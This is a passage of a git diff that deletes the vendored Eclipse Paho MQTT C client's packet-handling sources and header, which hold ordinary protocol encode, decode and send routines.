-#include "StackTrace.h"
-
-#include <stdlib.h>
-#include <string.h>
-
-#include "Heap.h"
-
-#if !defined(min)
-#define min(A,B) ( (A) < (B) ? (A):(B))
-#endif
-
-/**
- * List of the predefined MQTT v3 packet names.
- */
-static const char *packet_names[] =
-{
-	"RESERVED", "CONNECT", "CONNACK", "PUBLISH", "PUBACK", "PUBREC", "PUBREL",
-	"PUBCOMP", "SUBSCRIBE", "SUBACK", "UNSUBSCRIBE", "UNSUBACK",
-	"PINGREQ", "PINGRESP", "DISCONNECT"
-};
-
-const char** MQTTClient_packet_names = packet_names;
-
-
-/**
- * Converts an MQTT packet code into its name
- * @param ptype packet code
- * @return the corresponding string, or "UNKNOWN"
- */
-const char* MQTTPacket_name(int ptype)
-{
-	return (ptype >= 0 && ptype <= DISCONNECT) ? packet_names[ptype] : "UNKNOWN";
-}
-
-/**
- * Array of functions to build packets, indexed according to packet code
- */
-pf new_packets[] =
-{
-	NULL,	/**< reserved */
-	NULL,	/**< MQTTPacket_connect*/
-	MQTTPacket_connack, /**< CONNACK */
-	MQTTPacket_publish,	/**< PUBLISH */
-	MQTTPacket_ack, /**< PUBACK */
-	MQTTPacket_ack, /**< PUBREC */
-	MQTTPacket_ack, /**< PUBREL */
-	MQTTPacket_ack, /**< PUBCOMP */
-	NULL, /**< MQTTPacket_subscribe*/
-	MQTTPacket_suback, /**< SUBACK */
-	NULL, /**< MQTTPacket_unsubscribe*/
-	MQTTPacket_ack, /**< UNSUBACK */
-	MQTTPacket_header_only, /**< PINGREQ */
-	MQTTPacket_header_only, /**< PINGRESP */
-	MQTTPacket_header_only  /**< DISCONNECT */
-};
-
-
-static char* readUTFlen(char** pptr, char* enddata, int* len);
-static int MQTTPacket_send_ack(int type, int msgid, int dup, networkHandles *net);
-
-/**
- * Reads one MQTT packet from a socket.
- * @param socket a socket from which to read an MQTT packet
- * @param error pointer to the error code which is completed if no packet is returned
- * @return the packet structure or NULL if there was an error
- */
-void* MQTTPacket_Factory(networkHandles* net, int* error)
-{
-	char* data = NULL;
-	static Header header;
-	size_t remaining_length;
-	int ptype;
-	void* pack = NULL;
-	size_t actual_len = 0;
-
-	FUNC_ENTRY;
-	*error = SOCKET_ERROR;  /* indicate whether an error occurred, or not */
-
-	/* read the packet data from the socket */
-#if defined(OPENSSL)
-	*error = (net->ssl) ? SSLSocket_getch(net->ssl, net->socket, &header.byte) : Socket_getch(net->socket, &header.byte); 
-#else
-	*error = Socket_getch(net->socket, &header.byte);
-#endif
-	if (*error != TCPSOCKET_COMPLETE)   /* first byte is the header byte */
-		goto exit; /* packet not read, *error indicates whether SOCKET_ERROR occurred */
-
-	/* now read the remaining length, so we know how much more to read */
-	if ((*error = MQTTPacket_decode(net, &remaining_length)) != TCPSOCKET_COMPLETE)
-		goto exit; /* packet not read, *error indicates whether SOCKET_ERROR occurred */
-
-	/* now read the rest, the variable header and payload */
-#if defined(OPENSSL)
-	data = (net->ssl) ? SSLSocket_getdata(net->ssl, net->socket, remaining_length, &actual_len) : 
-						Socket_getdata(net->socket, remaining_length, &actual_len);
-#else
-	data = Socket_getdata(net->socket, remaining_length, &actual_len);
-#endif
-	if (data == NULL)
-	{
-		*error = SOCKET_ERROR;
-		goto exit; /* socket error */
-	}
-
-	if (actual_len != remaining_length)
-		*error = TCPSOCKET_INTERRUPTED;
-	else
-	{
-		ptype = header.bits.type;
-		if (ptype < CONNECT || ptype > DISCONNECT || new_packets[ptype] == NULL)
-			Log(TRACE_MIN, 2, NULL, ptype);
-		else
-		{
-			if ((pack = (*new_packets[ptype])(header.byte, data, remaining_length)) == NULL)
-				*error = BAD_MQTT_PACKET;
-#if !defined(NO_PERSISTENCE)
-			else if (header.bits.type == PUBLISH && header.bits.qos == 2)
-			{
-				int buf0len;
-				char *buf = malloc(10);
-				buf[0] = header.byte;
-				buf0len = 1 + MQTTPacket_encode(&buf[1], remaining_length);
-				*error = MQTTPersistence_put(net->socket, buf, buf0len, 1,
-					&data, &remaining_length, header.bits.type, ((Publish *)pack)->msgId, 1);
-				free(buf);
-			}
-#endif
-		}
-	}
-	if (pack)
-		time(&(net->lastReceived));
-exit:
-	FUNC_EXIT_RC(*error);
-	return pack;
-}
-
-
-/**
- * Sends an MQTT packet in one system call write
- * @param socket the socket to which to write the data
- * @param header the one-byte MQTT header
- * @param buffer the rest of the buffer to write (not including remaining length)
- * @param buflen the length of the data in buffer to be written
- * @return the completion code (TCPSOCKET_COMPLETE etc)
- */
-int MQTTPacket_send(networkHandles* net, Header header, char* buffer, size_t buflen, int freeData)
-{
-	int rc;
-	size_t buf0len;
-	char *buf;
-
-	FUNC_ENTRY;
-	buf = malloc(10);
-	buf[0] = header.byte;
-	buf0len = 1 + MQTTPacket_encode(&buf[1], buflen);
-#if !defined(NO_PERSISTENCE)
-	if (header.bits.type == PUBREL)
-	{
-		char* ptraux = buffer;
-		int msgId = readInt(&ptraux);
-		rc = MQTTPersistence_put(net->socket, buf, buf0len, 1, &buffer, &buflen,
-			header.bits.type, msgId, 0);
-	}
-#endif
-
-#if defined(OPENSSL)
-	if (net->ssl)
-		rc = SSLSocket_putdatas(net->ssl, net->socket, buf, buf0len, 1, &buffer, &buflen, &freeData);
-	else
-#endif
-		rc = Socket_putdatas(net->socket, buf, buf0len, 1, &buffer, &buflen, &freeData);
-		
-	if (rc == TCPSOCKET_COMPLETE)
-		time(&(net->lastSent));
-	
-	if (rc != TCPSOCKET_INTERRUPTED)
-	  free(buf);
-
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Sends an MQTT packet from multiple buffers in one system call write
- * @param socket the socket to which to write the data
- * @param header the one-byte MQTT header
- * @param count the number of buffers
- * @param buffers the rest of the buffers to write (not including remaining length)
- * @param buflens the lengths of the data in the array of buffers to be written
- * @return the completion code (TCPSOCKET_COMPLETE etc)
- */
-int MQTTPacket_sends(networkHandles* net, Header header, int count, char** buffers, size_t* buflens, int* frees)
-{
-	int i, rc;
-	size_t buf0len, total = 0;
-	char *buf;
-
-	FUNC_ENTRY;
-	buf = malloc(10);
-	buf[0] = header.byte;
-	for (i = 0; i < count; i++)
-		total += buflens[i];
-	buf0len = 1 + MQTTPacket_encode(&buf[1], total);
-#if !defined(NO_PERSISTENCE)
-	if (header.bits.type == PUBLISH && header.bits.qos != 0)
-	{   /* persist PUBLISH QoS1 and Qo2 */
-		char *ptraux = buffers[2];
-		int msgId = readInt(&ptraux);
-		rc = MQTTPersistence_put(net->socket, buf, buf0len, count, buffers, buflens,
-			header.bits.type, msgId, 0);
-	}
-#endif
-#if defined(OPENSSL)
-	if (net->ssl)
-		rc = SSLSocket_putdatas(net->ssl, net->socket, buf, buf0len, count, buffers, buflens, frees);
-	else
-#endif
-		rc = Socket_putdatas(net->socket, buf, buf0len, count, buffers, buflens, frees);
-		
-	if (rc == TCPSOCKET_COMPLETE)
-		time(&(net->lastSent));
-	
-	if (rc != TCPSOCKET_INTERRUPTED)
-	  free(buf);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Encodes the message length according to the MQTT algorithm
- * @param buf the buffer into which the encoded data is written
- * @param length the length to be encoded
- * @return the number of bytes written to buffer
- */
-int MQTTPacket_encode(char* buf, size_t length)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-	do
-	{
-		char d = length % 128;
-		length /= 128;
-		/* if there are more digits to encode, set the top bit of this digit */
-		if (length > 0)
-			d |= 0x80;
-		buf[rc++] = d;
-	} while (length > 0);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Decodes the message length according to the MQTT algorithm
- * @param socket the socket from which to read the bytes
- * @param value the decoded length returned
- * @return the number of bytes read from the socket
- */
-int MQTTPacket_decode(networkHandles* net, size_t* value)
-{
-	int rc = SOCKET_ERROR;
-	char c;
-	int multiplier = 1;
-	int len = 0;
-#define MAX_NO_OF_REMAINING_LENGTH_BYTES 4
-
-	FUNC_ENTRY;
-	*value = 0;
-	do
-	{
-		if (++len > MAX_NO_OF_REMAINING_LENGTH_BYTES)
-		{
-			rc = SOCKET_ERROR;	/* bad data */
-			goto exit;
-		}
-#if defined(OPENSSL)
-		rc = (net->ssl) ? SSLSocket_getch(net->ssl, net->socket, &c) : Socket_getch(net->socket, &c);
-#else
-		rc = Socket_getch(net->socket, &c);
-#endif
-		if (rc != TCPSOCKET_COMPLETE)
-				goto exit;
-		*value += (c & 127) * multiplier;
-		multiplier *= 128;
-	} while ((c & 128) != 0);
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Calculates an integer from two bytes read from the input buffer
- * @param pptr pointer to the input buffer - incremented by the number of bytes used & returned
- * @return the integer value calculated
- */
-int readInt(char** pptr)
-{
-	char* ptr = *pptr;
-	int len = 256*((unsigned char)(*ptr)) + (unsigned char)(*(ptr+1));
-	*pptr += 2;
-	return len;
-}
-
-
-/**
- * Reads a "UTF" string from the input buffer.  UTF as in the MQTT v3 spec which really means
- * a length delimited string.  So it reads the two byte length then the data according to
- * that length.  The end of the buffer is provided too, so we can prevent buffer overruns caused
- * by an incorrect length.
- * @param pptr pointer to the input buffer - incremented by the number of bytes used & returned
- * @param enddata pointer to the end of the buffer not to be read beyond
- * @param len returns the calculcated value of the length bytes read
- * @return an allocated C string holding the characters read, or NULL if the length read would
- * have caused an overrun.
- *
- */
-static char* readUTFlen(char** pptr, char* enddata, int* len)
-{
-	char* string = NULL;
-
-	FUNC_ENTRY;
-	if (enddata - (*pptr) > 1) /* enough length to read the integer? */
-	{
-		*len = readInt(pptr);
-		if (&(*pptr)[*len] <= enddata)
-		{
-			string = malloc(*len+1);
-			memcpy(string, *pptr, *len);
-			string[*len] = '\0';
-			*pptr += *len;
-		}
-	}
-	FUNC_EXIT;
-	return string;
-}
-
-
-/**
- * Reads a "UTF" string from the input buffer.  UTF as in the MQTT v3 spec which really means
- * a length delimited string.  So it reads the two byte length then the data according to
- * that length.  The end of the buffer is provided too, so we can prevent buffer overruns caused
- * by an incorrect length.
- * @param pptr pointer to the input buffer - incremented by the number of bytes used & returned
- * @param enddata pointer to the end of the buffer not to be read beyond
- * @return an allocated C string holding the characters read, or NULL if the length read would
- * have caused an overrun.
- */
-char* readUTF(char** pptr, char* enddata)
-{
-	int len;
-	return readUTFlen(pptr, enddata, &len);
-}
-
-
-/**
- * Reads one character from the input buffer.
- * @param pptr pointer to the input buffer - incremented by the number of bytes used & returned
- * @return the character read
- */
-unsigned char readChar(char** pptr)
-{
-	unsigned char c = **pptr;
-	(*pptr)++;
-	return c;
-}
-
-
-/**
- * Writes one character to an output buffer.
- * @param pptr pointer to the output buffer - incremented by the number of bytes used & returned
- * @param c the character to write
- */
-void writeChar(char** pptr, char c)
-{
-	**pptr = c;
-	(*pptr)++;
-}
-
-
-/**
- * Writes an integer as 2 bytes to an output buffer.
- * @param pptr pointer to the output buffer - incremented by the number of bytes used & returned
- * @param anInt the integer to write
- */
-void writeInt(char** pptr, int anInt)
-{
-	**pptr = (char)(anInt / 256);
-	(*pptr)++;
-	**pptr = (char)(anInt % 256);
-	(*pptr)++;
-}
-
-
-/**
- * Writes a "UTF" string to an output buffer.  Converts C string to length-delimited.
- * @param pptr pointer to the output buffer - incremented by the number of bytes used & returned
- * @param string the C string to write
- */
-void writeUTF(char** pptr, const char* string)
-{
-	size_t len = strlen(string);
-	writeInt(pptr, (int)len);
-	memcpy(*pptr, string, len);
-	*pptr += len;
-}
-
-
-/**
- * Writes length delimited data to an output buffer
- * @param pptr pointer to the output buffer - incremented by the number of bytes used & returned
- * @param data the data to write
- * @param datalen the length of the data to write
- */
-void writeData(char** pptr, const void* data, int datalen)
-{
-	writeInt(pptr, datalen);
-	memcpy(*pptr, data, datalen);
-	*pptr += datalen;
-}
-
-
-/**
- * Function used in the new packets table to create packets which have only a header.
- * @param aHeader the MQTT header byte
- * @param data the rest of the packet
- * @param datalen the length of the rest of the packet
- * @return pointer to the packet structure
- */
-void* MQTTPacket_header_only(unsigned char aHeader, char* data, size_t datalen)
-{
-	static unsigned char header = 0;
-	header = aHeader;
-	return &header;
-}
-
-
-/**
- * Send an MQTT disconnect packet down a socket.
- * @param socket the open socket to send the data to
- * @return the completion code (e.g. TCPSOCKET_COMPLETE)
- */
-int MQTTPacket_send_disconnect(networkHandles *net, const char* clientID)
-{
-	Header header;
-	int rc = 0;
-
-	FUNC_ENTRY;
-	header.byte = 0;
-	header.bits.type = DISCONNECT;
-	rc = MQTTPacket_send(net, header, NULL, 0, 0);
-	Log(LOG_PROTOCOL, 28, NULL, net->socket, clientID, rc);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Function used in the new packets table to create publish packets.
- * @param aHeader the MQTT header byte
- * @param data the rest of the packet
- * @param datalen the length of the rest of the packet
- * @return pointer to the packet structure
- */
-void* MQTTPacket_publish(unsigned char aHeader, char* data, size_t datalen)
-{
-	Publish* pack = malloc(sizeof(Publish));
-	char* curdata = data;
-	char* enddata = &data[datalen];
-
-	FUNC_ENTRY;
-	pack->header.byte = aHeader;
-	if ((pack->topic = readUTFlen(&curdata, enddata, &pack->topiclen)) == NULL) /* Topic name on which to publish */
-	{
-		free(pack);
-		pack = NULL;
-		goto exit;
-	}
-	if (pack->header.bits.qos > 0)  /* Msgid only exists for QoS 1 or 2 */
-		pack->msgId = readInt(&curdata);
-	else
-		pack->msgId = 0;
-	pack->payload = curdata;
-	pack->payloadlen = (int)(datalen-(curdata-data));
-exit:
-	FUNC_EXIT;
-	return pack;
-}
-
-
-/**
- * Free allocated storage for a publish packet.
- * @param pack pointer to the publish packet structure
- */
-void MQTTPacket_freePublish(Publish* pack)
-{
-	FUNC_ENTRY;
-	if (pack->topic != NULL)
-		free(pack->topic);
-	free(pack);
-	FUNC_EXIT;
-}
-
-
-/**
- * Send an MQTT acknowledgement packet down a socket.
- * @param type the MQTT packet type e.g. SUBACK
- * @param msgid the MQTT message id to use
- * @param dup boolean - whether to set the MQTT DUP flag
- * @param net the network handle to send the data to
- * @return the completion code (e.g. TCPSOCKET_COMPLETE)
- */
-static int MQTTPacket_send_ack(int type, int msgid, int dup, networkHandles *net)
-{
-	Header header;
-	int rc;
-	char *buf = malloc(2);
-	char *ptr = buf;
-
-	FUNC_ENTRY;
-	header.byte = 0;
-	header.bits.type = type;
-	header.bits.dup = dup;
-	if (type == PUBREL)
-	    header.bits.qos = 1;
-	writeInt(&ptr, msgid);
-	if ((rc = MQTTPacket_send(net, header, buf, 2, 1)) != TCPSOCKET_INTERRUPTED)
-		free(buf);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Send an MQTT PUBACK packet down a socket.
- * @param msgid the MQTT message id to use
- * @param socket the open socket to send the data to
- * @param clientID the string client identifier, only used for tracing
- * @return the completion code (e.g. TCPSOCKET_COMPLETE)
- */
-int MQTTPacket_send_puback(int msgid, networkHandles* net, const char* clientID)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-	rc =  MQTTPacket_send_ack(PUBACK, msgid, 0, net);
-	Log(LOG_PROTOCOL, 12, NULL, net->socket, clientID, msgid, rc);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Free allocated storage for a suback packet.
- * @param pack pointer to the suback packet structure
- */
-void MQTTPacket_freeSuback(Suback* pack)
-{
-	FUNC_ENTRY;
-	if (pack->qoss != NULL)
-		ListFree(pack->qoss);
-	free(pack);
-	FUNC_EXIT;
-}
-
-
-/**
- * Send an MQTT PUBREC packet down a socket.
- * @param msgid the MQTT message id to use
- * @param socket the open socket to send the data to
- * @param clientID the string client identifier, only used for tracing
- * @return the completion code (e.g. TCPSOCKET_COMPLETE)
- */
-int MQTTPacket_send_pubrec(int msgid, networkHandles* net, const char* clientID)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-	rc =  MQTTPacket_send_ack(PUBREC, msgid, 0, net);
-	Log(LOG_PROTOCOL, 13, NULL, net->socket, clientID, msgid, rc);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Send an MQTT PUBREL packet down a socket.
- * @param msgid the MQTT message id to use
- * @param dup boolean - whether to set the MQTT DUP flag
- * @param socket the open socket to send the data to
- * @param clientID the string client identifier, only used for tracing
- * @return the completion code (e.g. TCPSOCKET_COMPLETE)
- */
-int MQTTPacket_send_pubrel(int msgid, int dup, networkHandles* net, const char* clientID)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-	rc = MQTTPacket_send_ack(PUBREL, msgid, dup, net);
-	Log(LOG_PROTOCOL, 16, NULL, net->socket, clientID, msgid, rc);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Send an MQTT PUBCOMP packet down a socket.
- * @param msgid the MQTT message id to use
- * @param socket the open socket to send the data to
- * @param clientID the string client identifier, only used for tracing
- * @return the completion code (e.g. TCPSOCKET_COMPLETE)
- */
-int MQTTPacket_send_pubcomp(int msgid, networkHandles* net, const char* clientID)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-	rc = MQTTPacket_send_ack(PUBCOMP, msgid, 0, net);
-	Log(LOG_PROTOCOL, 18, NULL, net->socket, clientID, msgid, rc);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Function used in the new packets table to create acknowledgement packets.
- * @param aHeader the MQTT header byte
- * @param data the rest of the packet
- * @param datalen the length of the rest of the packet
- * @return pointer to the packet structure
- */
-void* MQTTPacket_ack(unsigned char aHeader, char* data, size_t datalen)
-{
-	Ack* pack = malloc(sizeof(Ack));
-	char* curdata = data;
-
-	FUNC_ENTRY;
-	pack->header.byte = aHeader;
-	pack->msgId = readInt(&curdata);
-	FUNC_EXIT;
-	return pack;
-}
-
-
-/**
- * Send an MQTT PUBLISH packet down a socket.
- * @param pack a structure from which to get some values to use, e.g topic, payload
- * @param dup boolean - whether to set the MQTT DUP flag
- * @param qos the value to use for the MQTT QoS setting
- * @param retained boolean - whether to set the MQTT retained flag
- * @param socket the open socket to send the data to
- * @param clientID the string client identifier, only used for tracing
- * @return the completion code (e.g. TCPSOCKET_COMPLETE)
- */
-int MQTTPacket_send_publish(Publish* pack, int dup, int qos, int retained, networkHandles* net, const char* clientID)
-{
-	Header header;
-	char *topiclen;
-	int rc = -1;
-
-	FUNC_ENTRY;
-	topiclen = malloc(2);
-
-	header.bits.type = PUBLISH;
-	header.bits.dup = dup;
-	header.bits.qos = qos;
-	header.bits.retain = retained;
-	if (qos > 0)
-	{
-		char *buf = malloc(2);
-		char *ptr = buf;
-		char* bufs[4] = {topiclen, pack->topic, buf, pack->payload};
-		size_t lens[4] = {2, strlen(pack->topic), 2, pack->payloadlen};
-		int frees[4] = {1, 0, 1, 0};
-
-		writeInt(&ptr, pack->msgId);
-		ptr = topiclen;
-		writeInt(&ptr, (int)lens[1]);
-		rc = MQTTPacket_sends(net, header, 4, bufs, lens, frees);
-		if (rc != TCPSOCKET_INTERRUPTED)
-			free(buf);
-	}
-	else
-	{
-		char* ptr = topiclen;
-		char* bufs[3] = {topiclen, pack->topic, pack->payload};
-		size_t lens[3] = {2, strlen(pack->topic), pack->payloadlen};
-		int frees[3] = {1, 0, 0};
-
-		writeInt(&ptr, (int)lens[1]);
-		rc = MQTTPacket_sends(net, header, 3, bufs, lens, frees);
-	}
-	if (rc != TCPSOCKET_INTERRUPTED)
-		free(topiclen);
-	if (qos == 0)
-		Log(LOG_PROTOCOL, 27, NULL, net->socket, clientID, retained, rc);
-	else
-		Log(LOG_PROTOCOL, 10, NULL, net->socket, clientID, pack->msgId, qos, retained, rc,
-				min(20, pack->payloadlen), pack->payload);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Free allocated storage for a various packet tyoes
- * @param pack pointer to the suback packet structure
- */
-void MQTTPacket_free_packet(MQTTPacket* pack)
-{
-	FUNC_ENTRY;
-	if (pack->header.bits.type == PUBLISH)
-		MQTTPacket_freePublish((Publish*)pack);
-	/*else if (pack->header.type == SUBSCRIBE)
-		MQTTPacket_freeSubscribe((Subscribe*)pack, 1);
-	else if (pack->header.type == UNSUBSCRIBE)
-		MQTTPacket_freeUnsubscribe((Unsubscribe*)pack);*/
-	else
-		free(pack);
-	FUNC_EXIT;
-}
diff --git a/thirdparty/paho.mqtt.c/src/MQTTPacket.h b/thirdparty/paho.mqtt.c/src/MQTTPacket.h
deleted file mode 100644
index 8bad955..0000000
--- a/thirdparty/paho.mqtt.c/src/MQTTPacket.h
+++ /dev/null
@@ -1,262 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2017 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs, Allan Stockdill-Mander - SSL updates
- *    Ian Craggs - MQTT 3.1.1 support
- *    Ian Craggs - big endian Linux reversed definition
- *******************************************************************************/
-
-#if !defined(MQTTPACKET_H)
-#define MQTTPACKET_H
-
-#include "Socket.h"
-#if defined(OPENSSL)
-#include "SSLSocket.h"
-#endif
-#include "LinkedList.h"
-#include "Clients.h"
-
-/*BE
-include "Socket"
-include "LinkedList"
-include "Clients"
-BE*/
-
-typedef unsigned int bool;
-typedef void* (*pf)(unsigned char, char*, size_t);
-
-#define BAD_MQTT_PACKET -4
-
-enum msgTypes
-{
-	CONNECT = 1, CONNACK, PUBLISH, PUBACK, PUBREC, PUBREL,
-	PUBCOMP, SUBSCRIBE, SUBACK, UNSUBSCRIBE, UNSUBACK,
-	PINGREQ, PINGRESP, DISCONNECT
-};
-
-#if defined(__linux__)
-#include <endian.h>
-#if __BYTE_ORDER == __BIG_ENDIAN
-	#define REVERSED 1
-#endif
-#endif
-
-/**
- * Bitfields for the MQTT header byte.
- */
-typedef union
-{
-	/*unsigned*/ char byte;	/**< the whole byte */
-#if defined(REVERSED)
-	struct
-	{
-		unsigned int type : 4;	/**< message type nibble */
-		bool dup : 1;			/**< DUP flag bit */
-		unsigned int qos : 2;	/**< QoS value, 0, 1 or 2 */
-		bool retain : 1;		/**< retained flag bit */
-	} bits;
-#else
-	struct
-	{
-		bool retain : 1;		/**< retained flag bit */
-		unsigned int qos : 2;	/**< QoS value, 0, 1 or 2 */
-		bool dup : 1;			/**< DUP flag bit */
-		unsigned int type : 4;	/**< message type nibble */
-	} bits;
-#endif
-} Header;
-
-
-/**
- * Data for a connect packet.
- */
-typedef struct
-{
-	Header header;	/**< MQTT header byte */
-	union
-	{
-		unsigned char all;	/**< all connect flags */
-#if defined(REVERSED)
-		struct
-		{
-			bool username : 1;			/**< 3.1 user name */
-			bool password : 1; 			/**< 3.1 password */
-			bool willRetain : 1;		/**< will retain setting */
-			unsigned int willQoS : 2;	/**< will QoS value */
-			bool will : 1;			/**< will flag */
-			bool cleanstart : 1;	/**< cleansession flag */
-			int : 1;	/**< unused */
-		} bits;
-#else
-		struct
-		{
-			int : 1;	/**< unused */
-			bool cleanstart : 1;	/**< cleansession flag */
-			bool will : 1;			/**< will flag */
-			unsigned int willQoS : 2;	/**< will QoS value */
-			bool willRetain : 1;		/**< will retain setting */
-			bool password : 1; 			/**< 3.1 password */
-			bool username : 1;			/**< 3.1 user name */
-		} bits;
-#endif
-	} flags;	/**< connect flags byte */
-
-	char *Protocol, /**< MQTT protocol name */
-		*clientID,	/**< string client id */
-        *willTopic,	/**< will topic */
-        *willMsg;	/**< will payload */
-
-	int keepAliveTimer;		/**< keepalive timeout value in seconds */
-	unsigned char version;	/**< MQTT version number */
-} Connect;
-
-
-/**
- * Data for a connack packet.
- */
-typedef struct
-{
-	Header header; /**< MQTT header byte */
-	union
-	{
-		unsigned char all;	/**< all connack flags */
-#if defined(REVERSED)
-		struct
-		{
-			unsigned int reserved : 7;	/**< message type nibble */
-			bool sessionPresent : 1;    /**< was a session found on the server? */
-		} bits;
-#else
-		struct
-		{
-			bool sessionPresent : 1;    /**< was a session found on the server? */
-			unsigned int reserved : 7;	/**< message type nibble */
-		} bits;
-#endif
-	} flags;	 /**< connack flags byte */
-	char rc; /**< connack return code */
-} Connack;
-
-
-/**
- * Data for a packet with header only.
- */
-typedef struct
-{
-	Header header;	/**< MQTT header byte */
-} MQTTPacket;
-
-
-/**
- * Data for a subscribe packet.
- */
-typedef struct
-{
-	Header header;	/**< MQTT header byte */
-	int msgId;		/**< MQTT message id */
-	List* topics;	/**< list of topic strings */
-	List* qoss;		/**< list of corresponding QoSs */
-	int noTopics;	/**< topic and qos count */
-} Subscribe;
-
-
-/**
- * Data for a suback packet.
- */
-typedef struct
-{
-	Header header;	/**< MQTT header byte */
-	int msgId;		/**< MQTT message id */
-	List* qoss;		/**< list of granted QoSs */
-} Suback;
-
-
-/**
- * Data for an unsubscribe packet.
- */
-typedef struct
-{
-	Header header;	/**< MQTT header byte */
-	int msgId;		/**< MQTT message id */
-	List* topics;	/**< list of topic strings */
-	int noTopics;	/**< topic count */
-} Unsubscribe;
-
-
-/**
- * Data for a publish packet.
- */
-typedef struct
-{
-	Header header;	/**< MQTT header byte */
-	char* topic;	/**< topic string */
-	int topiclen;
-	int msgId;		/**< MQTT message id */
-	char* payload;	/**< binary payload, length delimited */
-	int payloadlen;	/**< payload length */
-} Publish;
-
-
-/**
- * Data for one of the ack packets.
- */
-typedef struct
-{
-	Header header;	/**< MQTT header byte */
-	int msgId;		/**< MQTT message id */
-} Ack;
-
-typedef Ack Puback;
-typedef Ack Pubrec;
-typedef Ack Pubrel;
-typedef Ack Pubcomp;
-typedef Ack Unsuback;
-
-int MQTTPacket_encode(char* buf, size_t length);
-int MQTTPacket_decode(networkHandles* net, size_t* value);
-int readInt(char** pptr);
-char* readUTF(char** pptr, char* enddata);
-unsigned char readChar(char** pptr);
-void writeChar(char** pptr, char c);
-void writeInt(char** pptr, int anInt);
-void writeUTF(char** pptr, const char* string);
-void writeData(char** pptr, const void* data, int datalen);
-
-const char* MQTTPacket_name(int ptype);
-
-void* MQTTPacket_Factory(networkHandles* net, int* error);
-int MQTTPacket_send(networkHandles* net, Header header, char* buffer, size_t buflen, int free);
-int MQTTPacket_sends(networkHandles* net, Header header, int count, char** buffers, size_t* buflens, int* frees);
-
-void* MQTTPacket_header_only(unsigned char aHeader, char* data, size_t datalen);
-int MQTTPacket_send_disconnect(networkHandles* net, const char* clientID);
-
-void* MQTTPacket_publish(unsigned char aHeader, char* data, size_t datalen);
-void MQTTPacket_freePublish(Publish* pack);
-int MQTTPacket_send_publish(Publish* pack, int dup, int qos, int retained, networkHandles* net, const char* clientID);
-int MQTTPacket_send_puback(int msgid, networkHandles* net, const char* clientID);
-void* MQTTPacket_ack(unsigned char aHeader, char* data, size_t datalen);
-
-void MQTTPacket_freeSuback(Suback* pack);
-int MQTTPacket_send_pubrec(int msgid, networkHandles* net, const char* clientID);
-int MQTTPacket_send_pubrel(int msgid, int dup, networkHandles* net, const char* clientID);
-int MQTTPacket_send_pubcomp(int msgid, networkHandles* net, const char* clientID);
-
-void MQTTPacket_free_packet(MQTTPacket* pack);
-
-#if !defined(NO_BRIDGE)
-	#include "MQTTPacketOut.h"
-#endif
-
-#endif /* MQTTPACKET_H */
diff --git a/thirdparty/paho.mqtt.c/src/MQTTPacketOut.c b/thirdparty/paho.mqtt.c/src/MQTTPacketOut.c
deleted file mode 100644
index b924085..0000000
--- a/thirdparty/paho.mqtt.c/src/MQTTPacketOut.c
+++ /dev/null
@@ -1,269 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2017 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs, Allan Stockdill-Mander - SSL updates
- *    Ian Craggs - MQTT 3.1.1 support
- *    Rong Xiang, Ian Craggs - C++ compatibility
- *    Ian Craggs - binary password and will payload
- *******************************************************************************/
-
-/**
- * @file
- * \brief functions to deal with reading and writing of MQTT packets from and to sockets
- *
- * Some other related functions are in the MQTTPacket module
- */
-
-
-#include "MQTTPacketOut.h"
-#include "Log.h"
-#include "StackTrace.h"
-
-#include <string.h>
-#include <stdlib.h>
-
-#include "Heap.h"
-
-
-/**
- * Send an MQTT CONNECT packet down a socket.
- * @param client a structure from which to get all the required values
- * @param MQTTVersion the MQTT version to connect with
- * @return the completion code (e.g. TCPSOCKET_COMPLETE)
- */
-int MQTTPacket_send_connect(Clients* client, int MQTTVersion)
-{
-	char *buf, *ptr;
-	Connect packet;
-	int rc = -1, len;
-
-	FUNC_ENTRY;
-	packet.header.byte = 0;
-	packet.header.bits.type = CONNECT;
-
-	len = ((MQTTVersion == 3) ? 12 : 10) + (int)strlen(client->clientID)+2;
-	if (client->will)
-		len += (int)strlen(client->will->topic)+2 + client->will->payloadlen+2;
-	if (client->username)
-		len += (int)strlen(client->username)+2;
-	if (client->password)
-		len += client->passwordlen+2;
-
-	ptr = buf = malloc(len);
-	if (MQTTVersion == 3)
-	{
-		writeUTF(&ptr, "MQIsdp");
-		writeChar(&ptr, (char)3);
-	}
-	else if (MQTTVersion == 4)
-	{
-		writeUTF(&ptr, "MQTT");
-		writeChar(&ptr, (char)4);
-	}
-	else
-		goto exit;
